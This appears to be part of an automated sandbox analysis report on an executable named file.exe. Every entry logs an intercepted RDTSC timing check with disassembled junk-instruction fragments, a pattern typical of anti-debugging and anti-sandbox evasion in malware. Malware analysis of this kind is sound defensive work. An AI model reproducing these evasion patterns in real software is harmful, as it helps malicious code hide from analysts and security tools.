                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0D71 second address: 10F0D75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ECF50 second address: 10ECF62 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F99A4D68166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F99A4D68166h 0x00000012 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F3F86 second address: 10F3F8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F3F8C second address: 10F3F90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F87BE second address: 10F87E3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F99A452D6D4h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f jl 00007F99A452D6C6h 0x00000015 pop ecx 0x00000016 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FD5EB second address: 10FD5F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FD5F1 second address: 10FD5F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FD5F5 second address: 10FD605 instructions: 0x00000000 rdtsc 0x00000002 je 00007F99A4D68166h 0x00000008 jbe 00007F99A4D68166h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1090362 second address: 1090368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1090368 second address: 109036C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FCDAF second address: 10FCDB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FCDB3 second address: 10FCDD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F99A4D68166h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jbe 00007F99A4D68166h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a js 00007F99A4D68166h 0x00000020 jnl 00007F99A4D68166h 0x00000026 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FD039 second address: 10FD042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FD042 second address: 10FD05D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99A4D68176h 0x00000009 popad 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FD05D second address: 10FD062 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FD1CB second address: 10FD1E7 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F99A4D68174h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FD1E7 second address: 10FD1EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109DCDF second address: 109DCE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109DCE3 second address: 109DCF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007F99A452D6CAh 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109DCF6 second address: 109DCFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109DCFF second address: 109DD07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109DD07 second address: 109DD0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110481B second address: 110481F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11048A0 second address: 11048C8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F99A4D6816Dh 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jp 00007F99A4D68174h 0x00000018 push eax 0x00000019 push edx 0x0000001a js 00007F99A4D68166h 0x00000020 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1108738 second address: 110873D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110873D second address: 1108744 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1108E40 second address: 1108E44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1108FCE second address: 1108FD4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11092BD second address: 11092C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1109874 second address: 110987D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A11E5 second address: 10A1216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99A452D6D4h 0x00000009 popad 0x0000000a pushad 0x0000000b jc 00007F99A452D6C6h 0x00000011 push eax 0x00000012 pop eax 0x00000013 popad 0x00000014 popad 0x00000015 jbe 00007F99A452D6EFh 0x0000001b push ecx 0x0000001c push ebx 0x0000001d pop ebx 0x0000001e pop ecx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1089841 second address: 1089845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1089845 second address: 108985C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A452D6D3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1114DB3 second address: 1114DBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1114DBE second address: 1114DC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10970F6 second address: 10970FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10970FA second address: 1097100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1097100 second address: 1097106 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1097106 second address: 109710A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E13F6 second address: 10E13FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E13FA second address: 10E142B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F99A452D6D4h 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F99A452D6D2h 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E142B second address: 10E1485 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A4D6816Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F99A4D68174h 0x00000012 mov eax, dword ptr [eax] 0x00000014 pushad 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F99A4D68172h 0x0000001d popad 0x0000001e jmp 00007F99A4D68170h 0x00000023 popad 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E1485 second address: 10E1489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EEF5B second address: 10EEF7C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F99A4D68177h 0x00000008 jmp 00007F99A4D68171h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EEF7C second address: 10EEF80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0E78 second address: 10F0E7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0E7E second address: 10F0EA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A452D6D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F99A452D6CFh 0x00000016 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F1E85 second address: 10F1F47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 jmp 00007F99A4D68171h 0x0000000a pop esi 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f mov edi, dword ptr [ebp+122D2A79h] 0x00000015 push dword ptr fs:[00000000h] 0x0000001c push 00000000h 0x0000001e push ebp 0x0000001f call 00007F99A4D68168h 0x00000024 pop ebp 0x00000025 mov dword ptr [esp+04h], ebp 0x00000029 add dword ptr [esp+04h], 0000001Bh 0x00000031 inc ebp 0x00000032 push ebp 0x00000033 ret 0x00000034 pop ebp 0x00000035 ret 0x00000036 call 00007F99A4D68179h 0x0000003b mov edi, dword ptr [ebp+122D31D8h] 0x00000041 pop edi 0x00000042 mov dword ptr fs:[00000000h], esp 0x00000049 jmp 00007F99A4D68173h 0x0000004e mov eax, dword ptr [ebp+122D0675h] 0x00000054 mov edi, dword ptr [ebp+122D29C9h] 0x0000005a push FFFFFFFFh 0x0000005c call 00007F99A4D68172h 0x00000061 xor dword ptr [ebp+122D319Eh], edx 0x00000067 pop ebx 0x00000068 push eax 0x00000069 pushad 0x0000006a jmp 00007F99A4D6816Ch 0x0000006f push eax 0x00000070 push edx 0x00000071 jng 00007F99A4D68166h 0x00000077 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EDFA9 second address: 10EDFAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EE087 second address: 10EE092 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F99A4D68166h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F30E9 second address: 10F310B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F99A452D6D8h 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F41BF second address: 10F41CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A4D6816Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F51F4 second address: 10F51F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E159A second address: 10E159E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E159E second address: 10E15BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F99A452D6D2h 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E166A second address: 10E166E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E166E second address: 10E1672 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E1672 second address: 10E1680 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E1680 second address: 10E168A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F99A452D6C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E168A second address: 10E16A6 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F99A4D68168h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f push edi 0x00000010 jp 00007F99A4D68166h 0x00000016 pop edi 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E16A6 second address: 10E16D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jp 00007F99A452D6C8h 0x00000015 popad 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a pushad 0x0000001b jmp 00007F99A452D6CFh 0x00000020 push edi 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E189D second address: 10E18C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A4D68178h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F99A4D6816Ch 0x00000013 jns 00007F99A4D68166h 0x00000019 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E18C9 second address: 10E18CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E18CF second address: 10E18D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E18D3 second address: 10E18D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E1DA6 second address: 10E1DAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E1FE4 second address: 10E1FF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F99A452D6C6h 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E20B3 second address: 10E20C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007F99A4D68168h 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C1849 second address: 10C187B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F99A452D6C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b jo 00007F99A452D6ECh 0x00000011 jmp 00007F99A452D6D8h 0x00000016 push ecx 0x00000017 jnl 00007F99A452D6C6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1114373 second address: 1114377 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1114377 second address: 111437D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111437D second address: 1114386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1114386 second address: 11143AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 jmp 00007F99A452D6D9h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11143AC second address: 11143B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11143B0 second address: 11143C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F99A452D6CCh 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111452D second address: 1114539 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111469E second address: 11146A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11146A4 second address: 11146A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11147D6 second address: 11147F6 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F99A452D6C6h 0x00000008 jmp 00007F99A452D6CEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 jnl 00007F99A452D6C6h 0x00000016 pop ecx 0x00000017 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11147F6 second address: 11147FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11147FC second address: 1114802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1114802 second address: 1114806 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1119268 second address: 1119288 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F99A452D6D2h 0x00000008 jmp 00007F99A452D6CCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 jnl 00007F99A452D6C6h 0x00000018 pop eax 0x00000019 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1119792 second address: 1119796 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1119926 second address: 1119940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F99A452D6D1h 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1119940 second address: 111994C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111994C second address: 111995B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A452D6CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1118EFF second address: 1118F33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F99A4D68172h 0x0000000b popad 0x0000000c jp 00007F99A4D6817Bh 0x00000012 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1118F33 second address: 1118F3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1118F3B second address: 1118F3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1118F3F second address: 1118F43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1118F43 second address: 1118F6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F99A4D6816Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jnc 00007F99A4D68168h 0x00000015 push ecx 0x00000016 jng 00007F99A4D68166h 0x0000001c pop ecx 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1118F6B second address: 1118F71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1118F71 second address: 1118F7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F99A4D6816Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1119C05 second address: 1119C28 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F99A452D6D9h 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1119DAF second address: 1119DC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99A4D68172h 0x00000009 rdtsc
